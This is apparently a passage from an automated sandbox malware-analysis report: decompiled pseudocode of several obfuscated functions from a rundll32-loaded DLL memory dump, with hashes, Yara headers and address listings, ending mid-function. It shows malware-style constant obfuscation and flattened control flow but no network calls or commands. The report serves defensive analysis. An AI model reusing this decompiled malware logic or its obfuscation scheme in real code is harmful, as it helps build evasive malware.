                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 9s$<4$[*$a
                                                                        • API String ID: 0-239331953
                                                                        • Opcode ID: d0e58df00b0c86ff922bd6907dfca745df99386b0e2c539687ea4503f84d7d05
                                                                        • Instruction ID: 5a9fb4e3a59909fd41fb50e737628130f046b5500317e57dd636ad6f2bf099bc
                                                                        • Opcode Fuzzy Hash: d0e58df00b0c86ff922bd6907dfca745df99386b0e2c539687ea4503f84d7d05
                                                                        • Instruction Fuzzy Hash: 06512571D00219EBDF08CFE5D94A8DEBBB2FB48314F208119E521B62A0D7B95A55CFA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100199A4, Relevance: 4.0, Strings: 3, Instructions: 263COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 98%
                                                                        			E100199A4() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				char _v112;
				short _t279;
				short _t282;
				void* _t290;
				void* _t291;
				void* _t315;
				short* _t316;
				void* _t317;
				short* _t318;
				short* _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				void* _t329;

				_v88 = 0x9528;
				_t315 =  *0x100221b0 + 0x10;
				_v88 = _v88 << 0x10;
				_t291 = 0x29b6ea94;
				_v88 = _v88 ^ 0x95285eaa;
				_v84 = 0xe890;
				_t320 = 0x34;
				_v84 = _v84 * 0x1f;
				_v84 = _v84 ^ 0x001c45a3;
				_v28 = 0x9112;
				_v28 = _v28 / _t320;
				_t321 = 0x19;
				_v28 = _v28 * 0x31;
				_v28 = _v28 << 0xc;
				_v28 = _v28 ^ 0x088a98e7;
				_v52 = 0xda31;
				_v52 = _v52 >> 8;
				_v52 = _v52 << 4;
				_v52 = _v52 ^ 0x000066fb;
				_v24 = 0xe82b;
				_v24 = _v24 ^ 0xb4fe6801;
				_v24 = _v24 >> 0xa;
				_v24 = _v24 | 0xa81c026a;
				_v24 = _v24 ^ 0xa83d3e65;
				_v20 = 0x6909;
				_v20 = _v20 + 0xffffc42e;
				_v20 = _v20 << 0xd;
				_v20 = _v20 / _t321;
				_v20 = _v20 ^ 0x0039e32c;
				_v60 = 0xab82;
				_v60 = _v60 + 0xffff0bd3;
				_t322 = 0xf;
				_v60 = _v60 * 0x76;
				_v60 = _v60 ^ 0xffdec8c4;
				_v56 = 0x5e59;
				_v56 = _v56 / _t322;
				_v56 = _v56 >> 0xb;
				_v56 = _v56 ^ 0x00001434;
				_v96 = 0x977a;
				_t323 = 0x6f;
				_v96 = _v96 * 0x61;
				_v96 = _v96 ^ 0x00397eb3;
				_v92 = 0xa291;
				_v92 = _v92 | 0x42e1adc5;
				_v92 = _v92 ^ 0x42e1b77e;
				_v40 = 0x73d4;
				_v40 = _v40 / _t323;
				_v40 = _v40 << 1;
				_v40 = _v40 * 0x4a;
				_v40 = _v40 ^ 0x0000cc60;
				_v36 = 0x33bd;
				_v36 = _v36 >> 5;
				_v36 = _v36 ^ 0xc340ad00;
				_v36 = _v36 << 0xb;
				_v36 = _v36 ^ 0x0564fa7a;
				_v64 = 0xc60;
				_v64 = _v64 | 0x04416794;
				_t324 = 0x5f;
				_v64 = _v64 * 0xd;
				_v64 = _v64 ^ 0x3752d4dc;
				_v32 = 0xae9f;
				_v32 = _v32 + 0x24a;
				_v32 = _v32 + 0xffffd123;
				_t325 = 0x3d;
				_v32 = _v32 / _t324;
				_v32 = _v32 ^ 0x0000400c;
				_v72 = 0x4f8e;
				_v72 = _v72 << 0xb;
				_v72 = _v72 ^ 0x027c6373;
				_v12 = 0x21f4;
				_v12 = _v12 + 0x1717;
				_v12 = _v12 * 0x19;
				_v12 = _v12 + 0xffff4c52;
				_v12 = _v12 ^ 0x00049658;
				_v8 = 0xd7dc;
				_v8 = _v8 ^ 0x4ae28678;
				_v8 = _v8 * 0x67;
				_v8 = _v8 + 0xffff8b2b;
				_v8 = _v8 ^ 0x210e6813;
				_v44 = 0x10ca;
				_v44 = _v44 * 0xe;
				_v44 = _v44 ^ 0x21d1d5f5;
				_v44 = _v44 ^ 0x21d123f7;
				_v48 = 0xfc7c;
				_v48 = _v48 ^ 0x12e29e7b;
				_v48 = _v48 ^ 0x780ab142;
				_v48 = _v48 ^ 0x6ae8c2ee;
				_v80 = 0x56f;
				_t326 = 0x77;
				_v80 = _v80 / _t325;
				_v80 = _v80 ^ 0x0000686a;
				_v16 = 0x940a;
				_v16 = _v16 ^ 0x3241511d;
				_v16 = _v16 << 2;
				_v16 = _v16 | 0x2c0ae0b9;
				_v16 = _v16 ^ 0xed0fff5b;
				_v76 = 0xb74;
				_v76 = _v76 | 0xff1ac2c7;
				_v76 = _v76 ^ 0xff1aa207;
				_v108 = 0xf16f;
				_v108 = _v108 + 0xffff55fa;
				_v108 = _v108 ^ 0x00000b68;
				_v104 = 0x7f0f;
				_v104 = _v104 / _t326;
				_v104 = _v104 ^ 0x00004c16;
				_v68 = 0xc425;
				_v68 = _v68 << 0xf;
				_v68 = _v68 | 0xc23afe3b;
				_v68 = _v68 ^ 0xe23ab7b9;
				_v100 = 0xccd6;
				_v100 = _v100 | 0x04b2265a;
				_v100 = _v100 ^ 0x04b29fa8;
				_t290 = 2;
				do {
					while(_t291 != 0x2226ace9) {
						if(_t291 == 0x2622bc84) {
							_push(_t291);
							_t327 = E1000607F(_t291, __eflags, _t291, 0x10, 4);
							E1000D940(_t315, _v56, _v96, _v92, _t290,  &_v112, 1);
							_t317 = _t315 + _t290;
							E1000D940(_t317, _v36, _v64, _v32, 1,  &_v112, _t327);
							_t329 = _t329 + 0x40;
							_t318 = _t317 + _t327 * 2;
							_t291 = 0x29e4095b;
							_t279 = 0x5c;
							 *_t318 = _t279;
							_t315 = _t318 + _t290;
							continue;
						} else {
							if(_t291 == 0x29b6ea94) {
								_t282 = E10017B6B();
								_v112 = _t282;
								_t291 = 0x2622bc84;
								continue;
							} else {
								_t334 = _t291 - 0x29e4095b;
								if(_t291 == 0x29e4095b) {
									_push(_t291);
									_t328 = E1000607F(_t291, _t334, _t291, 0x10, 4);
									E1000D940(_t315, _v80, _v16, _v76, 1,  &_v112, _t328);
									_t329 = _t329 + 0x28;
									_t319 = _t315 + _t328 * 2;
									_t291 = 0x2226ace9;
									_t282 = 0x2e;
									 *_t319 = _t282;
									_t315 = _t319 + _t290;
									continue;
								}
							}
						}
						goto L9;
					}
					E1000D940(_t315, _v104, _v68, _v100, 1,  &_v112, 3);
					_t316 = _t315 + 6;
					_t329 = _t329 + 0x18;
					_t291 = 0x2b0037fd;
					 *_t316 = 0;
					_t315 = _t316 + _t290;
					__eflags = _t315;
					L9:
					__eflags = _t291 - 0x2b0037fd;
				} while (__eflags != 0);
				return _t282;
			}

















































                                                                        0x100199b5
                                                                        0x100199bc
                                                                        0x100199bf
                                                                        0x100199c3
                                                                        0x100199c8
                                                                        0x100199cf
                                                                        0x100199dc
                                                                        0x100199df
                                                                        0x100199e2
                                                                        0x100199e9
                                                                        0x100199f7
                                                                        0x100199fe
                                                                        0x10019a01
                                                                        0x10019a04
                                                                        0x10019a08
                                                                        0x10019a0f
                                                                        0x10019a16
                                                                        0x10019a1a
                                                                        0x10019a1e
                                                                        0x10019a25
                                                                        0x10019a2c
                                                                        0x10019a33
                                                                        0x10019a37
                                                                        0x10019a3e
                                                                        0x10019a45
                                                                        0x10019a4c
                                                                        0x10019a53
                                                                        0x10019a5e
                                                                        0x10019a61
                                                                        0x10019a68
                                                                        0x10019a6f
                                                                        0x10019a7a
                                                                        0x10019a7d
                                                                        0x10019a80
                                                                        0x10019a87
                                                                        0x10019a95
                                                                        0x10019a98
                                                                        0x10019a9c
                                                                        0x10019aa3
                                                                        0x10019aae
                                                                        0x10019aaf
                                                                        0x10019ab2
                                                                        0x10019ab9
                                                                        0x10019ac0
                                                                        0x10019ac7
                                                                        0x10019ace
                                                                        0x10019ada
                                                                        0x10019add
                                                                        0x10019ae4
                                                                        0x10019ae7
                                                                        0x10019aee
                                                                        0x10019af5
                                                                        0x10019af9
                                                                        0x10019b00
                                                                        0x10019b04
                                                                        0x10019b0b
                                                                        0x10019b12
                                                                        0x10019b21
                                                                        0x10019b24
                                                                        0x10019b27
                                                                        0x10019b2e
                                                                        0x10019b35
                                                                        0x10019b3c
                                                                        0x10019b48
                                                                        0x10019b49
                                                                        0x10019b4e
                                                                        0x10019b55
                                                                        0x10019b5c
                                                                        0x10019b60
                                                                        0x10019b67
                                                                        0x10019b6e
                                                                        0x10019b7b
                                                                        0x10019b7e
                                                                        0x10019b85
                                                                        0x10019b8c
                                                                        0x10019b93
                                                                        0x10019b9e
                                                                        0x10019ba1
                                                                        0x10019ba8
                                                                        0x10019baf
                                                                        0x10019bba
                                                                        0x10019bbd
                                                                        0x10019bc4
                                                                        0x10019bcb
                                                                        0x10019bd2
                                                                        0x10019bd9
                                                                        0x10019be0
                                                                        0x10019be7
                                                                        0x10019bf3
                                                                        0x10019bf4
                                                                        0x10019bf9
                                                                        0x10019c00
                                                                        0x10019c07
                                                                        0x10019c0e
                                                                        0x10019c12
                                                                        0x10019c19
                                                                        0x10019c20
                                                                        0x10019c27
                                                                        0x10019c2e
                                                                        0x10019c35
                                                                        0x10019c3c
                                                                        0x10019c43
                                                                        0x10019c4a
                                                                        0x10019c58
                                                                        0x10019c5b
                                                                        0x10019c62
                                                                        0x10019c69
                                                                        0x10019c6d
                                                                        0x10019c74
                                                                        0x10019c7b
                                                                        0x10019c82
                                                                        0x10019c89
                                                                        0x10019c90
                                                                        0x10019c91
                                                                        0x10019c91
                                                                        0x10019ca3
                                                                        0x10019d25
                                                                        0x10019d32
                                                                        0x10019d47
                                                                        0x10019d50
                                                                        0x10019d63
                                                                        0x10019d68
                                                                        0x10019d6b
                                                                        0x10019d6e
                                                                        0x10019d75
                                                                        0x10019d76
                                                                        0x10019d79
                                                                        0x00000000
                                                                        0x10019ca5
                                                                        0x10019cab
                                                                        0x10019d07
                                                                        0x10019d0c
                                                                        0x10019d0f
                                                                        0x00000000
                                                                        0x10019cad
                                                                        0x10019cad
                                                                        0x10019cb3
                                                                        0x10019cc5
                                                                        0x10019cd0
                                                                        0x10019ce7
                                                                        0x10019cec
                                                                        0x10019cef
                                                                        0x10019cf2
                                                                        0x10019cf9
                                                                        0x10019cfa
                                                                        0x10019cfd
                                                                        0x00000000
                                                                        0x10019cfd
                                                                        0x10019cb3
                                                                        0x10019cab
                                                                        0x00000000
                                                                        0x10019ca3
                                                                        0x10019d96
                                                                        0x10019d9b
                                                                        0x10019da0
                                                                        0x10019da3
                                                                        0x10019da8
                                                                        0x10019dab
                                                                        0x10019dab
                                                                        0x10019dad
                                                                        0x10019dad
                                                                        0x10019dad
                                                                        0x10019dbf

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ,9$[)$[)
                                                                        • API String ID: 0-3362820381
                                                                        • Opcode ID: 603117b8363adce16010609699c3a886c8196d66e76f24d38a98b26cfbd9f97d
                                                                        • Instruction ID: 44abcb00151ec1b00a79a92a733cf4ca5547ce6a62ffc74197264c17b034da66
                                                                        • Opcode Fuzzy Hash: 603117b8363adce16010609699c3a886c8196d66e76f24d38a98b26cfbd9f97d
                                                                        • Instruction Fuzzy Hash: 2AC13475D00309DBEB18CFE5D98A9DEBBB6FB44304F208119E116BB2A4C3B55A46CF40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000D0DE, Relevance: 3.9, Strings: 3, Instructions: 149COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 90%
                                                                        			E1000D0DE(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* _t133;
				void* _t144;
				signed int _t153;
				signed int _t154;
				void* _t157;
				void* _t169;
				void* _t170;
				signed int* _t173;

				_push(_a16);
				_t169 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t133);
				_v48 = 0x5a8b;
				_t173 =  &(( &_v60)[6]);
				_v48 = _v48 ^ 0x4360b52a;
				_v48 = _v48 ^ 0x1a806351;
				_t170 = 0;
				_v48 = _v48 >> 2;
				_t157 = 0x13068ceb;
				_v48 = _v48 ^ 0x1678233d;
				_v8 = 0x8630;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x00000862;
				_v52 = 0x326b;
				_v52 = _v52 >> 1;
				_v52 = _v52 | 0xc7f7cfdb;
				_v52 = _v52 ^ 0x87f7dfff;
				_v12 = 0x4e1;
				_v12 = _v12 | 0x6d92ca4a;
				_v12 = _v12 ^ 0x2d92ceeb;
				_v28 = 0xfb25;
				_v28 = _v28 | 0x71bf14c1;
				_v28 = _v28 << 8;
				_v28 = _v28 ^ 0xbfffdb80;
				_v32 = 0xf237;
				_v32 = _v32 >> 4;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 ^ 0x000074ee;
				_v36 = 0xcd16;
				_t153 = 0x3c;
				_v36 = _v36 * 0x44;
				_v36 = _v36 ^ 0x3fdc784b;
				_v36 = _v36 ^ 0x3fea737c;
				_v20 = 0xb3fe;
				_v20 = _v20 >> 7;
				_v20 = _v20 ^ 0x00007694;
				_v56 = 0xdd00;
				_v56 = _v56 * 0x23;
				_v56 = _v56 + 0xffff9337;
				_v56 = _v56 << 7;
				_v56 = _v56 ^ 0x0ee528fc;
				_v60 = 0xf711;
				_v60 = _v60 >> 4;
				_v60 = _v60 | 0x4989a590;
				_v60 = _v60 + 0xffff6a05;
				_v60 = _v60 ^ 0x49891a0f;
				_v40 = 0x92cf;
				_v40 = _v40 ^ 0xf586a06e;
				_v40 = _v40 + 0xffff6eef;
				_v40 = _v40 << 0xd;
				_v40 = _v40 ^ 0xb4326dcb;
				_v44 = 0x65dd;
				_v44 = _v44 / _t153;
				_v44 = _v44 << 6;
				_v44 = _v44 + 0xffff872c;
				_v44 = _v44 ^ 0xffffb82a;
				_v16 = 0xf090;
				_t154 = 0x21;
				_v16 = _v16 / _t154;
				_v16 = _v16 ^ 0x00005a72;
				_v24 = 0xb1df;
				_v24 = _v24 * 6;
				_v24 = _v24 << 9;
				_v24 = _v24 ^ 0x08564d31;
				while(_t157 != 0x13068ceb) {
					if(_t157 == 0x32a00bf2) {
						_t144 = E1001551E(_a16,  &_v4, _v28, _t169, 0, _v52 | _v48, _v32, _v36, _v20);
						_t173 =  &(_t173[7]);
						if(_t144 != 0) {
							_t157 = 0x39bb1850;
							continue;
						}
					} else {
						if(_t157 == 0x367d931e) {
							E1001551E(_a16,  &_v4, _v40, _t169, _t170, _v12 | _v8, _v44, _v16, _v24);
						} else {
							if(_t157 != 0x39bb1850) {
								L10:
								if(_t157 != 0x1d94fa77) {
									continue;
								} else {
								}
							} else {
								_push(_t157);
								_t170 = E100157E8(_v4 + _v4);
								if(_t170 != 0) {
									_t157 = 0x367d931e;
									continue;
								}
							}
						}
					}
					return _t170;
				}
				_t157 = 0x32a00bf2;
				goto L10;
			}


























                                                                        0x1000d0e5
                                                                        0x1000d0e9
                                                                        0x1000d0eb
                                                                        0x1000d0ef
                                                                        0x1000d0f3
                                                                        0x1000d0f7
                                                                        0x1000d0f8
                                                                        0x1000d0f9
                                                                        0x1000d0fe
                                                                        0x1000d106
                                                                        0x1000d109
                                                                        0x1000d113
                                                                        0x1000d11b
                                                                        0x1000d11d
                                                                        0x1000d122
                                                                        0x1000d127
                                                                        0x1000d12f
                                                                        0x1000d137
                                                                        0x1000d13c
                                                                        0x1000d144
                                                                        0x1000d14c
                                                                        0x1000d150
                                                                        0x1000d158
                                                                        0x1000d160
                                                                        0x1000d168
                                                                        0x1000d170
                                                                        0x1000d178
                                                                        0x1000d180
                                                                        0x1000d188
                                                                        0x1000d18d
                                                                        0x1000d195
                                                                        0x1000d19d
                                                                        0x1000d1a2
                                                                        0x1000d1a7
                                                                        0x1000d1af
                                                                        0x1000d1be
                                                                        0x1000d1c1
                                                                        0x1000d1c5
                                                                        0x1000d1cd
                                                                        0x1000d1d5
                                                                        0x1000d1dd
                                                                        0x1000d1e2
                                                                        0x1000d1ea
                                                                        0x1000d1f7
                                                                        0x1000d1fb
                                                                        0x1000d203
                                                                        0x1000d208
                                                                        0x1000d210
                                                                        0x1000d218
                                                                        0x1000d21d
                                                                        0x1000d225
                                                                        0x1000d22d
                                                                        0x1000d235
                                                                        0x1000d23d
                                                                        0x1000d245
                                                                        0x1000d24d
                                                                        0x1000d252
                                                                        0x1000d25a
                                                                        0x1000d26a
                                                                        0x1000d26e
                                                                        0x1000d273
                                                                        0x1000d27b
                                                                        0x1000d283
                                                                        0x1000d28f
                                                                        0x1000d292
                                                                        0x1000d296
                                                                        0x1000d29e
                                                                        0x1000d2b5
                                                                        0x1000d2b9
                                                                        0x1000d2be
                                                                        0x1000d2c6
                                                                        0x1000d2d0
                                                                        0x1000d322
                                                                        0x1000d327
                                                                        0x1000d32c
                                                                        0x1000d32e
                                                                        0x00000000
                                                                        0x1000d32e
                                                                        0x1000d2d2
                                                                        0x1000d2d4
                                                                        0x1000d364
                                                                        0x1000d2d6
                                                                        0x1000d2dc
                                                                        0x1000d337
                                                                        0x1000d33d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000d33f
                                                                        0x1000d2de
                                                                        0x1000d2ea
                                                                        0x1000d2f3
                                                                        0x1000d2f8
                                                                        0x1000d2fa
                                                                        0x00000000
                                                                        0x1000d2fa
                                                                        0x1000d2f8
                                                                        0x1000d2dc
                                                                        0x1000d2d4
                                                                        0x1000d375
                                                                        0x1000d375
                                                                        0x1000d335
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: k2$rZ$|s?
                                                                        • API String ID: 0-1348797666
                                                                        • Opcode ID: 1a504f0c04b87af0b1b48271f2f1a4297b55bdfd64aa91b8cb3f8916695204b1
                                                                        • Instruction ID: c5a9857de1bd72a55434b072a893e00a77e4adad4e3d5eb919c6f6467bcc56a9
                                                                        • Opcode Fuzzy Hash: 1a504f0c04b87af0b1b48271f2f1a4297b55bdfd64aa91b8cb3f8916695204b1
                                                                        • Instruction Fuzzy Hash: 84610E71109341AFD358CF25C88981FBBE1FB98788F50591DF5969A260D3B2CA49CF93
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001DB25, Relevance: 3.9, Strings: 3, Instructions: 142COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 91%
                                                                        			E1001DB25(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				void* _t118;
				void* _t135;
				signed int _t138;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				void* _t144;
				void* _t163;
				signed int* _t166;

				_push(_a16);
				_t162 = _a4;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t118);
				_v96 = 0x6541;
				_t166 =  &(( &_v96)[6]);
				_v96 = _v96 ^ 0x91bfb37d;
				_v96 = _v96 >> 0x10;
				_t163 = 0;
				_v96 = _v96 << 0xe;
				_t144 = 0xd16dbf6;
				_v96 = _v96 ^ 0x246feaa2;
				_v80 = 0xafef;
				_v80 = _v80 + 0xd5f0;
				_v80 = _v80 >> 8;
				_v80 = _v80 ^ 0x000020f9;
				_v60 = 0x3fa;
				_v60 = _v60 << 8;
				_v60 = _v60 ^ 0x0003a875;
				_v68 = 0xdac3;
				_v68 = _v68 >> 4;
				_t138 = 0x79;
				_v68 = _v68 * 0x37;
				_v68 = _v68 ^ 0x0002ab2a;
				_v56 = 0xacb2;
				_v56 = _v56 << 3;
				_v56 = _v56 ^ 0x00056a81;
				_v72 = 0x451e;
				_v72 = _v72 << 0xa;
				_v72 = _v72 >> 1;
				_v72 = _v72 ^ 0x008a68a2;
				_v76 = 0xa9b5;
				_v76 = _v76 ^ 0x71c268bb;
				_v76 = _v76 >> 0xb;
				_v76 = _v76 ^ 0x000e50b8;
				_v84 = 0x733c;
				_v84 = _v84 + 0xffff2d0a;
				_v84 = _v84 | 0xc6f06430;
				_v84 = _v84 + 0xffffe838;
				_v84 = _v84 ^ 0xffffb7ce;
				_v88 = 0xd1fe;
				_v88 = _v88 / _t138;
				_v88 = _v88 | 0xc6561511;
				_t139 = 0x35;
				_v88 = _v88 / _t139;
				_v88 = _v88 ^ 0x03be11ae;
				_v64 = 0xb503;
				_v64 = _v64 ^ 0x4b2bbc6a;
				_v64 = _v64 + 0xffffbb02;
				_v64 = _v64 ^ 0x4b2ab619;
				_v92 = 0x25d2;
				_t140 = 0x57;
				_v92 = _v92 * 0x42;
				_v92 = _v92 / _t140;
				_t141 = 0x2f;
				_v92 = _v92 / _t141;
				_v92 = _v92 ^ 0x00006e4e;
				do {
					while(_t144 != 0xd16dbf6) {
						if(_t144 == 0x14ed0f49) {
							__eflags = E1001D290(_v84, _v88, _v64, _t162 + 8, _v92,  &_v52);
							_t163 =  !=  ? 1 : _t163;
						} else {
							if(_t144 == 0x2713230a) {
								_t135 = E10009899(_t162, _v68, __eflags,  &_v52, _v56, _v72, _v76);
								_t166 =  &(_t166[4]);
								__eflags = _t135;
								if(__eflags != 0) {
									_t144 = 0x14ed0f49;
									continue;
								}
							} else {
								if(_t144 != 0x2ae8b971) {
									goto L9;
								} else {
									E1001F3E9(_v96, _v80, _v60, _a12,  &_v52);
									_t166 =  &(_t166[3]);
									_t144 = 0x2713230a;
									continue;
								}
							}
						}
						L12:
						return _t163;
					}
					_t144 = 0x2ae8b971;
					L9:
					__eflags = _t144 - 0x88de44a;
				} while (__eflags != 0);
				goto L12;
			}
























                                                                        0x1001db2c
                                                                        0x1001db33
                                                                        0x1001db37
                                                                        0x1001db3e
                                                                        0x1001db45
                                                                        0x1001db46
                                                                        0x1001db47
                                                                        0x1001db48
                                                                        0x1001db4d
                                                                        0x1001db55
                                                                        0x1001db58
                                                                        0x1001db62
                                                                        0x1001db67
                                                                        0x1001db69
                                                                        0x1001db6e
                                                                        0x1001db73
                                                                        0x1001db7b
                                                                        0x1001db83
                                                                        0x1001db8b
                                                                        0x1001db90
                                                                        0x1001db98
                                                                        0x1001dba0
                                                                        0x1001dba5
                                                                        0x1001dbad
                                                                        0x1001dbb5
                                                                        0x1001dbc1
                                                                        0x1001dbc4
                                                                        0x1001dbc8
                                                                        0x1001dbd0
                                                                        0x1001dbd8
                                                                        0x1001dbdd
                                                                        0x1001dbe5
                                                                        0x1001dbed
                                                                        0x1001dbf2
                                                                        0x1001dbf6
                                                                        0x1001dbfe
                                                                        0x1001dc06
                                                                        0x1001dc0e
                                                                        0x1001dc13
                                                                        0x1001dc1b
                                                                        0x1001dc23
                                                                        0x1001dc2b
                                                                        0x1001dc33
                                                                        0x1001dc3b
                                                                        0x1001dc43
                                                                        0x1001dc53
                                                                        0x1001dc57
                                                                        0x1001dc63
                                                                        0x1001dc68
                                                                        0x1001dc6e
                                                                        0x1001dc76
                                                                        0x1001dc7e
                                                                        0x1001dc86
                                                                        0x1001dc8e
                                                                        0x1001dc96
                                                                        0x1001dca3
                                                                        0x1001dca6
                                                                        0x1001dcb2
                                                                        0x1001dcba
                                                                        0x1001dcbd
                                                                        0x1001dcc6
                                                                        0x1001dcd3
                                                                        0x1001dcd3
                                                                        0x1001dcdd
                                                                        0x1001dd69
                                                                        0x1001dd6b
                                                                        0x1001dcdf
                                                                        0x1001dce5
                                                                        0x1001dd29
                                                                        0x1001dd2e
                                                                        0x1001dd31
                                                                        0x1001dd33
                                                                        0x1001dd35
                                                                        0x00000000
                                                                        0x1001dd35
                                                                        0x1001dce7
                                                                        0x1001dce9
                                                                        0x00000000
                                                                        0x1001dceb
                                                                        0x1001dd03
                                                                        0x1001dd08
                                                                        0x1001dd0b
                                                                        0x00000000
                                                                        0x1001dd0b
                                                                        0x1001dce9
                                                                        0x1001dce5
                                                                        0x1001dd6f
                                                                        0x1001dd77
                                                                        0x1001dd77
                                                                        0x1001dd39
                                                                        0x1001dd3b
                                                                        0x1001dd3b
                                                                        0x1001dd3b
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: <s$Ae$Nn
                                                                        • API String ID: 0-1679991533
                                                                        • Opcode ID: 92a5fa941ec84b2a13816d9790ac9f10e8bf9b01ff2aa242d1ce98f0185b00fe
                                                                        • Instruction ID: a6ffe0389ab2164942154368da0f3f4b89edecd288a42e9cb3f2d23efd3a417b
                                                                        • Opcode Fuzzy Hash: 92a5fa941ec84b2a13816d9790ac9f10e8bf9b01ff2aa242d1ce98f0185b00fe
                                                                        • Instruction Fuzzy Hash: 995176712083419FD358EF21D88951BBBE1FBC8348F508A1DF59996260D7B5CA49CF83
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10010F6D, Relevance: 3.9, Strings: 3, Instructions: 125COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10010F6D() {
				signed char _v2;
				signed int _v276;
				signed int _v280;
				char _v284;
				signed short _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				void* _t107;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				intOrPtr _t123;
				signed int* _t125;

				_t125 =  &_v368;
				_v336 = 0x6cd7e4;
				_v332 = 0x3eb088;
				_t107 = 0x11f8fc3e;
				_t123 = 0;
				_v328 = 0;
				_v324 = 0;
				_v340 = 0x4b20;
				_v340 = _v340 | 0xad173eb8;
				_v340 = _v340 ^ 0xad171b79;
				_v368 = 0x5c5a;
				_v368 = _v368 | 0x9193e072;
				_v368 = _v368 ^ 0x84c7a0cb;
				_t119 = 0x62;
				_v368 = _v368 / _t119;
				_v368 = _v368 ^ 0x0037af10;
				_v352 = 0x141d;
				_v352 = _v352 + 0xbd3d;
				_t120 = 0x7c;
				_v352 = _v352 * 7;
				_v352 = _v352 ^ 0x0005e092;
				_v344 = 0x5f9b;
				_v344 = _v344 | 0x8244af57;
				_v344 = _v344 ^ 0x8244aa36;
				_v360 = 0xe6d9;
				_v360 = _v360 + 0xa592;
				_v360 = _v360 / _t120;
				_t121 = 0x1b;
				_v360 = _v360 * 0x3c;
				_v360 = _v360 ^ 0x0000cf96;
				_v356 = 0x3abe;
				_v356 = _v356 >> 0x10;
				_v356 = _v356 >> 6;
				_v356 = _v356 ^ 0x00000525;
				_v364 = 0x1f65;
				_v364 = _v364 >> 6;
				_v364 = _v364 * 0x16;
				_v364 = _v364 | 0xfb440427;
				_v364 = _v364 ^ 0xfb445ef1;
				_v348 = 0x48;
				_v348 = _v348 / _t121;
				_v348 = _v348 ^ 0x0000083a;
				do {
					while(_t107 != 0x2ebf197) {
